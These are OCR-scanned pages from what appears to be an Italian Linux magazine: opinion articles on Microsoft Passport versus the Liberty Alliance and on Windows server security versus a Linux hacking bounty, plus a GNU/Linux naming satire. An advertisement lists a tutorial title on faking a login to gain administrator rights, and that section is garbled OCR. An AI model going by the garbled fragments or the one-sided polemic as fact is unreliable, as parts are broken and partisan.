fatto che di questo ci si 
occupa in altre parti della 
rivista. Si è voluto solo fare 
qualche considerazione, non 
solo sulla possibilità di usa- 
re questo pacchetto per atti- 
vità didattiche, ma anche su- 
gli indubbi vantaggi di cui si 
beneficia con l'uso dello 
stesso in un ambiente di la- 
voro basato sulla piattafor- 
ma GNU/Linux opportuna- 
mente configurata. Ricordia- 
mo, come sempre, che 
maggiori dettagli su questi 
argomenti sono reperibili 
presso il sito del gruppo 
linuxdidattica: www.linuxdi- 
dattica.org. 


Fulvio Ferroni 
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Un miliardo 


di identità nell'alleanza 
della libertà 


Una credibile alternativa si schiera contro il progetto 
Microsoft di concentrazione dei dati sensibili nei 


propri archivi. 


ank of America, 
United Airlines, 
Nokia, la 
Telecom 
Giapponese (NTT 
DoCoMo), General 
Motors, Dun and 
Bradstreet, ma anche 
Cisco e Vodaphone 
insieme a qualche altra 
dozzina di 
organizzazioni del 
genere che 
rappresentano 
complessivamente (loro 
dicono) più di un 
miliardo 
(potenzialmente) di 
identità in rete non si 
fidano dello schema di 
autenticazione 
approntato da Microsoft 
per la propria 
piattaforma .NET, ma 
ciò che più interessa noi 
è che stanno seguendo 
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(e finanziando) uno 
schema alternativo 
proposto da alcune 
stelle dell'Open Source 
come la Apache 
Software Foundation, 
CollabNet e O'Reilly & 
Associates. 

La contesa tra il big 
(brother) 
dell'informatica e i sette 
nanetti dell'Open 
Source è dovuta al 
Passaporto che di qui a 
qualche anno dovrebbe 
essere l'unico 
documento che in giro 
per la Rete potrebbe 
attestare la nostra 
identità e permetterci di 
avere accesso a tutte le 
risorse disponibili. 

La necessità di 
rovesciare l'attuale 
situazione in cui sia gli 
utenti che i fornitori di 


servizio non hanno una 
forte certificazione di 
autenticità e faticano a 
costruire le proprie 
relazioni di fiducia, è 
voluta soprattutto dalle 
imprese commerciali 
che hanno 
assolutamente bisogno 
di suscitare negli utenti 
quella minima 
sensazione di fiducia 
che possa permettere 
loro di mettere mano al 
portafoglio per fare i 
propri acquisti su 
Internet in volumi un 
po' meno che simbolici 
di adesso. 

Una necessità 
importante e 
significativa la cui 
soluzione, proprio 
perchè si situa nel 
campo delle relazioni di 
fiducia, non può essere 


affrontata con 
superficialità e 
sfrontatezza, ma che 
Microsoft ha "risolto" 
con il solito piglio 
decisionista da primo 
della classe. In meno di 
un anno il gigante di 
Redmond sta 
convertendosi 
velocemente da 
software house "pura" 
ad intermediario 
tecnologico, tutti i suoi 
passi sono tesi in quella 
situazione. Lo sviluppo 
del software sta 
diventando sempre più 
un'attività collaterale, 
ma la posizione di 
predominanza nel 
campo dei sistemi 
operativi è la leva che 
Microsoft sta usando 
per entrare in un campo 
in cui non ha nè una 
storia nè un background 
degno di nota. 

Ciò nonostante fervono i 
preparativi per l'arrivo 
di Hailstorm, la nuova 
piattaforma tecnologica 
di Microsoft che 
rivoluzionerà (dicono) il 
modo di intendere 
l'informatica. E sia... Il 
problema sta in una 
piccola e quasi invisibile 
componente del grande 
disegno: Passport, il 
meccanismo di 
autenticazione. 

Una soluzione geniale! 
Che solo a Bill Gates 
poteva venire in mente, 
già che lui è l'unico ad 
aver garantito 
l'innovazione degli 
ultimi 25 anni. Chissà 
come mai nessuno degli 
istituti di credito, che 
hanno una certa 
esperienza nel campo, ci 
aveva mai pensato 
finora, anzi. 

La soluzione è: 


concentrare in un unico 
punto il controllo 
dell'autenticazione per 
l'accesso alle risorse 
con quello dell'identità 
individuale. Come a dire 
mettere assieme il 
vostro profilo "vitale", 
con tutte le possibili 
informazioni che sarà 
possibile reperire su di 
voi, sia che le abbiate 
immesse 
volontariamente o che 
siano state "dragate" 
attraverso acquisti di 
profili individuali, e tutti 
i vostri "movimenti" in 
rete, in tutte le reti 
possibili, e quindi non 
solo Internet, ma le reti 
cellulari (GSM e UTMS), 
quelle satellitari (DVB). 
Insomma dare modo a 
qualcuno di seguirvi 
passo passo e sapere 
pure tutto quello che 
neppure voi sapete di 
voi stesso. 

Informazioni così 
rilevanti e sensibili che 
faticheremmo a metterle 
in mano persino ad un 
Garante della Privacy 
onest'uomo come 
Rodotà, e che come 
minimo vorremmo poter 
sapere come, dove, da 
chi e in che modo 
vengono trattate. 
Insomma qualcosa di 
così importante che 
presumibilmente 
dovrebbero essere 
affidate ad un ufficio 
dell'ONU, come minimo. 
E invece? E invece, 
nell'indifferenza 
generale, Microsoft con 
molta "leggerezza" ha 
inserito nella sua 
piattaforma questo 
obbligatorio servizio di 
autenticazione, quasi 
come se fosse un pezzo 
come un'altro. 


E tanti, troppi, hanno 
abboccato affidando a 
chi non ha mai 
dimostrato di saper 
gestire una cosa del 
genere l'unica cosa 
veramente importante 
nel campo commerciale: 
la fiducia. 
Ancora una volta dal 
mondo dell'Open 
Source viene una 
risposta, l'unica 
risposta. E l'ingenuità 
del nome prescelto, 
l'Alleanza della Libertà, 
è la migliore risposta a 
chi pretende di voler 
gestire tutti Passaporti 
dell'era 
dell'Informazione. 
Produrre uno standard 
aperto, un meccanismo 
di gestione chiaro e 
trasparente di quei dati, 
separare 
l'autenticazione alle 
risorse dalla gestione 
dei profili, e soprattutto 
levare dalle mani di una 
singola impresa 
commerciale ogni 
conoscenza su ogni 
persona non è una 
prospettiva estrema: è 
assolutamente il minimo 
per poter realizzare 
quell'ambiente di fiducia 
così necessario. Ciò 
nonostante è 
incoraggiante che gli 
intermediari di "un 
miliardo" di identità 
siano disposti ad 
investire in questo. 
Da notare (al solito) 
l'assenza della nostra 
"grande" Europa dei 
Garanti di ogni minuzia 
che supina ad ogni 
volere di Microsoft 
semplicemente fa finta 
che il problema non 
esista. 

Emmanuele Somma 

esomma@ieee.org 
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MS Passport 


Con Passport ogni utente può accedere alle proprie 
informazioni personali presso diversi siti che adottano 
tale tecnologia ed effettuare acquisti e transazione 
sicure, semplicemente accedendo con il proprio indi- 
rizzo di posta elettronica e specificando una pas- 
sword. Per ogni utente che si registra al servizio 
Passport viene creato un profilo. È possibile esami- 
nare o aggiornare il proprio profilo in qualsiasi 
momento visitando il Profile Center, dove sarà possi- 
bile modificare le informazioni personali. Per evitare 
che altri utenti possano accedere al vostro profilo, 
verrà richiesto di specificare l'account Microsoft 
Passport (indirizzo di posta elettronica e password). 

Il servizio Passport assegna un numero di identifica- 
zione personale e lo invia al computer sotto forma di 
un piccolo file di testo (un comune filecookie). 
L'utilizzo del cookie consente di visitare altri siti Web 
che aderiscono al programma Passport senza dover 
eseguire la procedura di accesso ogni volta. La con- 
nessione ad un sito che offre il servizio "Passport" 
non autorizza l'invio automatico dei vostri dati. Fino al 
momento in cui cliccate sull'icona "Microsoft 
Passport", nessun'informazione viene inviata, nean- 
che quelle che avete scelto di condividere quando è 
stato creato il vostro "Passport". Il sistema si basa, ed 
è quindi eseguibile, su browser abilitati per 
Javascript, SSL e cooky. Attraverso lo scripting ven- 
gono rilevati marca, versione e presenza degli applet 
e update necessari. Il riconoscimento di un utente 
registrato, e le conseguenti procedure di login, avven- 
gono, anche in questo caso, attraverso il sistema dei 
cooky. Si tratta di cooky crittografati, nei quali sono 
presenti informazioni che aiutano il sistema 

"Passport" a realizzare, in maniera automatica, il login 
nelle consultazioni successive della medesima ses- 
sione di navigazione. Tutto quanto viene trasmesso, 
mediante il servizio "Wallet", tra il vostro computer e 
il server Microsoft. Il contenuto delle informazioni è 
crittografato ed inviato attraverso il protocollo SSL, 
che nelle sue diverse varianti ha dimostrato, fino ad 
oggi, di essere abbastanza affidabile. Il cooky crittato, 
presente sul vostro computer, viene automaticamen- 
te rimosso alla fine di ogni singola sessione di consul- 
tazione, per ovvi motivi di sicurezza. AI successivo 
login, nel vostro "Passport", un cooky identico viene 
automaticamente scaricato sul vostro computer. Il 
servizio viene tuttora offerto in pochi siti, la maggior 
parte dei quali direttamente o indirettamente nelle 
mani della Microsoft, che sta procedendo a tappe 
serrate ad un test privato con i maggiori siti interes- 
sati ad implementare il servizio "Passport". 
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Icrosoft alle corde 
DI omette e promette, 
Linux sfida 


Strategie quanto mai diverse per affrontare il 
problema della sicurezza dei server internet rispetto 
al virus informatici. Una sfrontata iniziativa di 
NetProject rigira il coltello in una dolorosa piaga di 


e riviste dell'informa- 

tica seria, quelle 

ammesse ai livelli 

del top management 
dei servizi informatici delle 
grandi aziende, e gli anali- 
sti del mercato IT ormai 
chiedono a gran voce il 
conto a Microsoft per lo 
stato pietoso del supporto 
ai problemi relativi agli 
attacchi informatici, che 
hanno messo in ginocchio 
una new economy già allo 
stremo. Aver cosparso il 
mondo di manifesti in cui 
"l'unico modo di penetrare 
in un server Windows" 
sarebbe un piede di porco 
ha avuto l'effetto contra- 
stante di aver fatto pensare 
che invece il prezzo richie- 
sto per la tanto pubblicizza- 
ta sicurezza di questo siste- 
ma operativo sia quello 
piuttosto un furto con scas- 
so. 
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| bug sono evidenti 


Le magagne del sistema 
operativo in sè, dei 
software di gestione dei 
servizi come Internet 
Information Server, e delle 
principali applicazioni come 
Internet Explorer o la suite 
Office, sono ormai così 
evidenti che nessuno più 
dubita dei pesanti difetti 
architetturali dell'intero 
castello di bit messo su dal 
gigante di Redmond. 

Una situazione che 
Microsoft sta affrontando 
nel peggiore dei modi. “E' 
tutta colpa degli 
amministratori di sistema 
che non adottano in tempo 
le nostre patch" - 
affermano dal quartier 
generale. Anzi tutta colpa 
del successo, infatti 
(mischiando un po' le carte) 
da Microsoft rispondono “è 
naturale che la piattaforma 


Windows. 


più diffusa al mondo sia più 
esposta agli attacchi". 
Questo nonostante 
l'accoppiata Apache/Unix, 
che nel campo dei server 
per internet sono di gran 
lunga la prima piattaforma, 
risulti essere notevolmente 
meno esposta allo stesso 
genere di attacchi. 

Infatti, per quanto riguarda i 
server internet, la 
situazione risulta talmente 
grave da portare persino la 
società di analisi del 
panorama informatico più 
importante al mondo, quel 
Gartner Group che già 
aveva consigliato di 
rimandare l'adozione di 
Windows 2000 fino a che si 
fossero stabilizzati i suoi 
primi evidenti buchi di sicu- 
rezza, a lanciare un monito 
chiaro e forte: valutate piat- 
taforme alternative al ser- 
ver Microsoft per Internet 


(Windows/IIS). 

Trascinata a forza nella 
soluzione di questo non 
indifferente problema che 
impatta sulla qualità della 
vita informatica delle 
aziende che si affidano a 
Microsoft per i propri 
servizi internet, ma 
soprattutto di quella di tutti 
gli utenti che subiscono il 
risultato di questa 
insicurezza, Microsoft ha 
risposto forgiando per 
prima cosa un nome con 
relativo acronimo: 
"Strategic Technology 
Protection Program" ovvero 
STPP. Subito dopo uno 
slogan "Non ci riposeremo 
finchè il vostro business 
non sarà sicuro. Punto". Poi 
un bel comunicato stampa 
in cui recitare che il nuovo 
programma strategico di 
sicurezza messo a punto 
"rappresenta una 
mobilitazione di uomini e 
risorse senza precedenti" 
per garantire "la sicurezza 
di Internet e dei dati dei 
nostri clienti". Inoltre un 
percorso ordinato 
composto di due fasi, 
ciascuna con il suo bel 
nome e rispettivamente 
"Get Secure" e "Stay 
Secure", un bel numero 
verde per dare informazio- 
ni, un CD con i tool utili ai 
"clienti per proteggere i 
propri sistemi dagli attac- 
chi". E infine ha tracciato il 
futuro dei sistemi operativi 
Microsoft in cui attraverso 
meccanismi software po- 
tranno scaricare automati- 
camente su tutti i computer 
aggiornamenti e modifiche 
per rendere "più sicura" 
ogni singola workstation 
senza che neppure l'utente 
si accorga di quello che sta 
avvenendo. Peccato che 
proprio di questo software 
di casa Microsoft John Pe- 


scatore, uno dei più in- 
fluenti analisti del Gartner 
Group, aveva scritto uno 
impietoso rapporto in cui 
nel tracciare le debolezze 
architetturali dei sistemi 
Windows sostiene che il 
problema di fondo sia 
esclusivamente nella pes- 
sima qualità del software 
distribuito ai clienti. Brian 
Valentine, vice presidente 
della divisione Windows di 
Microsoft, risponde vantano 
le meraviglie di Windows 
XP nel campo dell'aggiorna- 
mento automatico ma con- 
clude dicendo: "in generale 
Internet non è sicura, que- 
sto non è solo un problema 
di Microsoft". Parole che 
non sono piaciute ad Eddie 
Bleasdale, direttore delle 
consulenze del progetto 
open source NetProject, che 
lancia una provocazione 
fatta apposta per dimostrare 
che Internet non sarebbe 
così insicura se i sistemi 
operativi e i programmi 
affrontassero correttamente 
i problemi di sicurezza. 


Una taglia su Linux 
Un cha li corretta- 
mente configurato è inattac- 
cabile ai virus, al codice ma- 
lizioso, ai maleintenzionati. 
Da oltre due anni Bleasdale 
ha messo in palio dalle pro- 
prie tasche 10.000 sterline 
(più 30 milioni di lire). 
Nessuno finora ha nemme- 
no lontanamente scalfito la 
sua macchina. "Microsoft si 
è occupata solo della fun- 
zionalità del suo software. 
Tutte le sue applicazioni e il 
sistema operativo non han- 
no alcun meccanismo di 
protezione. Il problema non 
è Internet. Il problema è Mi- 
crosoft. Mi ci gioco 10.000 
sterline ;)" 


IIMpiiù 


Non chiedeteci 
perche è megdglio il 3D 


...Ma scopritelo su Maxi 3D Collection. 


EL] 


3D Studio Max + Autocad + LightWave « Truespaco + Bryce 


In edicola 


TUTORIAL 
* Tutto quello che avreste 


sempre voluto sapere sui file 


Controlla la tua Casa * Linux approda anche 


sulla PlayStation 2 


da remoto * Grafica per il Web? 


Niente di più facile con GIMP 


* Guida alla configurazione 


GNU lancia la sfida cn 
m * Creare immagini 
Microsoft .NET - CRIS 
193 
QMail Vs SendMail: Loup. TECNICHE 2 CD-Rom sempre allegati alla nie 
* 3 


un newsreader con i socket 


a *FakeLogin: come fare 
SOFTWARE un login fasullo e acquisire 


i permessi di amministratore 


*SAP DB: il database \V > 
Open Source di SAP APPROFONDIMENTI 
* Corel Draw, il porting RA Da eno OLIO 
per Linux della più famosa è ada € SKtop: 
suite per la grafica vettoriale $ “Università on ine, 


un sogno ormai realtà 


*Un esempio pratico 


di integrazione tra | il ri S p P r 0 
i : ; Linux e didattica M 
STAROFFICE PER LA CREAZIONE E MODIFICA DI DOCUMENTI HTML di | U N A N n 0 


L'abbonamento per un anno in offerta esclusiva ai nostri lettori. 
La rivista direttamente a casa, a prezzo bloccato per tutto l'anno. 


LILLIT 


maintà 


Da sidero abbonarmi alla vostra rivista per un anno (6 numeri), al costo di Lire 54.900 (Euro 28,35). L'abbonamer Ito Verrà attivato sul primo numero utile, 
ccessivo alla data di ricevimento della mia richiesta completa di tutte le informazioni necessarie. Scelgo di effettuare il Pagamento: 


[] Con ce/p n.16821878 (inviare la r 


raglia postale (inviare la ricev 


samento unitami 


ite alla presente cartolina! 


alla presente cartolina) 
testato ad EDIZIONI MASTER S.r.l. (allegare in busta chiusa alla presente cartolina) 


ITIIILI[ILLIILLI 


anto alla comunicazione dei miei dati pe ali ed al loro successivo uso secondo quanto specificato nella informativa canta invia (IS [Uno 


La. n. glo l'o d'eiizili. o 


Ridi, 


è divertente... 


Il nome GNU/Linux e le sue implicazioni 


In seguito ad una recente riaffermazione del fondatore 
della Free Software Foundation e santone della GNU 
GPL, Richard Stallman, in merito alla necessità di 
denominare il sistema una volta conosciuto come 
Linux piuttosto in GNU/Linux in base alla 
considerazione che solo una modesta parte delle 
attuali distribuzioni possa ascriversi in effetti a Linux 
stesso mentre la gran parte sarebbe piuttosto da 
mettere in diretta relazione con la Free Software 
Foundation stessa e il suo progetto GNU's Not Unix, 
alcuni altri sviluppatori di software libero molto 
conosciuto hanno ritenuto di far sentire il proprio 
pensiero sull'argomento. 


Uno dei distributori Linux più conosciuti ed influenti 
ha comunicato che nella propria distribuzione 
effettivamente il kernel Linux occupa non più del 3% 
mentre il software GNU non oltre il 30. Sul residuo 
67% si stanno compiendo ulteriori indagini. 


Viste le dimensioni in gioco il consorzio Xfree86 ha 
avanzato la richiesta che anche la propria etichetta 
compaia nel nome dei sistema e, pur con minor 
enfasi, tale richiesta l'hanno fatta gli sviluppatori di 
Wine, Perl, Berkeley, Gimp, Mesa, Python, Apache, 
Sendmail, Mozilla, Netscape, StarOffice, Bind e Tcl, 
ciascuno dei quali non condividendo la licenza GNU si 
è sentito in diritto di richiedere, come a gran voce fa 
Stallman, il proprio posto nel nome delle distribuzioni 
Linux. 


Tutte le distribuzioni che attualmente portano il nome 
GNU/Linux non hanno scelta per l'obbligo morale che 
lo stesso Stallman ha caricato su di loro. 


Secondo la loro configurazione dovranno chiamarsi, 
ad esempio, Wine/Perl/BSD/Gimp/Mesa/Python/ 
Apache/Sendmail/Mozilla/Netscape/StarOffice/Bind/ 
TcUGNU/Linux, o WPBSMPASMNSBTGL (in breve 
‘Linux'). 

RedHat, sentitosi chiamato in causa, dopo lunghi e 
sofferti consigli di amministrazione, ha considerato la 
fattibilità tecnica di ridenominare la propria 
distribuzione ‘/s -R / (abbreviato in "Lisa Slash"). In tal 
modo, evitando eventuali successivi cambi di nome 
dettati dall'inserimento di ulteriori programmi, 
sarebbe possibile realizzare i necessari investimenti 
aziendali. La shell Bash, infatti, esegue l'operazione 


indicata sostituendola con il nome di tutti i programmi 
disponibili nel sistema. 


Altri vendor commerciali di sistemi Unix stanno 
valutando simili opzioni e persino Microsoft, per 
evitare le solite polemiche, è in via di definizione di 
un nuovo nome del tipo: 

“Clicca sul pulsante ‘Avvio’. Muovi su ‘Trova’. 
Seleziona ‘Files e Cartelle'. Si apre una finestra 
denominata ‘Trova. Inserisci "*.*" nel campo 'Nome'. 
Seleziona ‘Risorse del Computer" nella casella a 
discesa del menu 'Trova'. Premi ‘Trova ora'. Per 
favore attendi". (Microsoft ha ritenuto che il più 
diretto nome “dir C:\*.* /s" fosse di gran lunga più 
complicato per gli utenti. 


Liberamente tratto da segfault.org 
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